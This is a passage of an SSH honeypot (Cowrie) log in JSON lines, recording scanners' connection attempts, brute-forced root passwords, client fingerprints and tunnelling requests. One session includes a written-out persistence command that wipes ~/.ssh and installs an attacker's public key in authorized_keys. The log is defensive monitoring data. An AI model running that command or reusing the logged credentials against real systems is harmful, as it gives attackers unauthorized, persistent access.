com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:22:42.781847Z","src_ip":"27.112.78.245","session":"958ebfe6a91f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64902,"dst_ip":"1.2.3.4","dst_port":22,"session":"2941fc1fc827","protocol":"ssh","message":"New connection: 217.72.205.35:64902 (1.2.3.4:22) [session: 2941fc1fc827]","sensor":"my-vps","timestamp":"2025-08-26T00:22:43.609839Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:43.611774Z","src_ip":"217.72.205.35","session":"2941fc1fc827"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:22:43.890540Z","src_ip":"27.112.78.245","session":"958ebfe6a91f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:44.166593Z","src_ip":"27.112.78.245","session":"958ebfe6a91f"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:22:44.167681Z","src_ip":"27.112.78.245","session":"882fbaa3e53a"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":46778,"dst_ip":"1.2.3.4","dst_port":22,"session":"4604f69aacae","protocol":"ssh","message":"New connection: 36.89.28.139:46778 (1.2.3.4:22) [session: 4604f69aacae]","sensor":"my-vps","timestamp":"2025-08-26T00:23:07.955358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:23:07.956259Z","src_ip":"36.89.28.139","session":"4604f69aacae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:23:08.179966Z","src_ip":"36.89.28.139","session":"4604f69aacae"}
{"eventid":"cowrie.login.failed","username":"zhaoyi","password":"zhaoyi","message":"login attempt [zhaoyi/zhaoyi] failed","sensor":"my-vps","timestamp":"2025-08-26T00:23:09.119344Z","src_ip":"36.89.28.139","session":"4604f69aacae"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:10.346427Z","src_ip":"36.89.28.139","session":"4604f69aacae"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":41400,"dst_ip":"1.2.3.4","dst_port":22,"session":"12006a3b1a91","protocol":"ssh","message":"New connection: 24.108.102.132:41400 (1.2.3.4:22) [session: 12006a3b1a91]","sensor":"my-vps","timestamp":"2025-08-26T00:23:12.993596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:23:12.998909Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:23:13.166837Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.login.success","username":"root","password":"idc2.com.cn","message":"login attempt [root/idc2.com.cn] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:23:13.832310Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:23:14.182028Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.182843Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.183719Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54368,"dst_ip":"1.2.3.4","dst_port":22,"session":"45a9cf68e915","protocol":"ssh","message":"New connection: 212.227.235.229:54368 (1.2.3.4:22) [session: 45a9cf68e915]","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.207984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.208845Z","src_ip":"212.227.235.229","session":"45a9cf68e915"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.352497Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:23:14.799752Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.800460Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.972113Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:14.973091Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":41608,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dfd6da4a8d7","protocol":"ssh","message":"New connection: 24.108.102.132:41608 (1.2.3.4:22) [session: 2dfd6da4a8d7]","sensor":"my-vps","timestamp":"2025-08-26T00:23:15.122743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:23:15.127963Z","src_ip":"24.108.102.132","session":"2dfd6da4a8d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:23:15.290599Z","src_ip":"24.108.102.132","session":"2dfd6da4a8d7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:23:15.961283Z","src_ip":"24.108.102.132","session":"2dfd6da4a8d7"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T00:23:17.120712Z","src_ip":"212.227.235.229","session":"45a9cf68e915"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:17.128170Z","src_ip":"24.108.102.132","session":"2dfd6da4a8d7"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":41620,"dst_ip":"1.2.3.4","dst_port":22,"session":"9229fe43eb99","protocol":"ssh","message":"New connection: 24.108.102.132:41620 (1.2.3.4:22) [session: 9229fe43eb99]","sensor":"my-vps","timestamp":"2025-08-26T00:23:17.285062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:23:17.290311Z","src_ip":"24.108.102.132","session":"9229fe43eb99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:23:17.452688Z","src_ip":"24.108.102.132","session":"9229fe43eb99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:23:18.117204Z","src_ip":"24.108.102.132","session":"9229fe43eb99"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:18.279589Z","src_ip":"24.108.102.132","session":"12006a3b1a91"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:23:18.284985Z","src_ip":"24.108.102.132","session":"9229fe43eb99"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:23:18.976863Z","src_ip":"212.227.235.229","session":"45a9cf68e915"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.228.208.160","dst_port":443,"src_ip":"212.227.235.229","src_port":50566,"message":"direct-tcp connection request to 54.228.208.160:443 from 127.0.0.1:50566","sensor":"my-vps","timestamp":"2025-08-26T00:23:20.974206Z","session":"45a9cf68e915"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.228.208.160","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd2\\xeb\\xc6\\x9c\\xf4l\\xafi\\x01+\\x99\\x87\\x0e\\\\\\x95\\x86)\\xdb\\xd5\\x85\\xdf\\x89X\\xbfu=S\\xc6\\xae\\xc6\\xfb\\xb5 o\\xcd\\x8d\\x0fd\\x89\\xb3`-?S\\xc8\\xc6\\x05\\x9e\\x90`c\\xcfu\\xb1*w\\x10\\x92\\xe0\\x9d\\xbe\\xeb.\\xdaT\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc8\\xab\\xa7\\x1d\\xa5\\x96@8\\xae\\x0f\\xcb\\xba\\x1f[\\xd5\\xcc\\xdd\\xb1\\xd6~\\xe9\\x1d\\xfa\\\\\\xf57\\x85\\xa9\\xe8\\x8b\\xce\\x08\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.228.208.160:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd2\\xeb\\xc6\\x9c\\xf4l\\xafi\\x01+\\x99\\x87\\x0e\\\\\\x95\\x86)\\xdb\\xd5\\x85\\xdf\\x89X\\xbfu=S\\xc6\\xae\\xc6\\xfb\\xb5 o\\xcd\\x8d\\x0fd\\x89\\xb3`-?S\\xc8\\xc6\\x05\\x9e\\x90`c\\xcfu\\xb1*w\\x10\\x92\\xe0\\x9d\\xbe\\xeb.\\xdaT\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc8\\xab\\xa7\\x1d\\xa5\\x96@8\\xae\\x0f\\xcb\\xba\\x1f[\\xd5\\xcc\\xdd\\xb1\\xd6~\\xe9\\x1d\\xfa\\\\\\xf57\\x85\\xa9\\xe8\\x8b\\xce\\x08\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T00:23:22.358400Z","src_ip":"212.227.235.229","session":"45a9cf68e915"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.76.24.222","dst_port":443,"src_ip":"212.227.235.229","src_port":52760,"message":"direct-tcp connection request to 104.76.24.222:443 from 127.0.0.1:52760","sensor":"my-vps","timestamp":"2025-08-26T00:23:22.819849Z","session":"45a9cf68e915"}
